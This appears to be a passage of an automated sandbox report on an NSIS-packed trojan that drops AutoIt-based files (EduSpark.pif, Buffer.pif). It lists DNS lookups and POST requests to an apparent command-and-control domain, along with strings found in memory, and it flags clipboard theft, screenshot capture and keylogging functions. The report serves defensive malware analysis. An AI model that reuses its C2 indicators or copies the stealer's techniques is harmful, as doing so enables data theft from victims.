Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004ED889 InternetReadFile,SetEvent,GetLastError,SetEvent, 18_2_004ED889
Source: global traffic DNS traffic detected: DNS query: hhnlUmHdzjZFqZYoOtpryMy.hhnlUmHdzjZFqZYoOtpryMy
Source: global traffic DNS traffic detected: DNS query: zippyfinickysofwps.shop
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: zippyfinickysofwps.shop
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.entrust.net02
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.entrust.net03
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1602918760.000000000291C000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000000.1641628839.00000000004C5000.00000002.00000001.01000000.00000005.sdmp, EduSpark.pif, 00000012.00000000.1685519659.0000000000545000.00000002.00000001.01000000.00000008.sdmp, EduSpark.pif, 00000015.00000002.1831255863.0000000000545000.00000002.00000001.01000000.00000008.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000000.1948376082.00000000004C5000.00000002.00000001.01000000.00000005.sdmp, Buffer.pif, 0000001E.00000000.2607068219.00000000004C5000.00000002.00000001.01000000.00000005.sdmp, EduSpark.pif.10.dr, Kde.0.dr, Buffer.pif.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://www.entrust.net/rpa03
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038718915.0000000003B66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038718915.0000000003B66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: https://www.entrust.net/rpa0
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Tags.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Buffer.pif, 0000001A.00000003.2159826380.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159945485.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160533803.0000000001759000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160654760.00000000017C9000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159883618.0000000001759000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/
Source: Buffer.pif, 0000001A.00000003.2159513394.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160741640.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159964966.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159513394.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160675221.00000000017D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/api
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/api-aF
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/apil
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/h
Source: Buffer.pif, 0000001A.00000003.2159826380.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159945485.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160654760.00000000017C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/pi
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/pic
Source: Buffer.pif, 0000001A.00000003.2159826380.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159945485.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160654760.00000000017C9000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2132311001.00000000017BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/pil
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/piu
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49747 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405582
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 18_2_004EF7C7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 26_2_0046F7C7
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 18_2_004EF55C
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01631351 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 26_2_01631351
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 18_2_004DA635
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00509FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 18_2_00509FD2
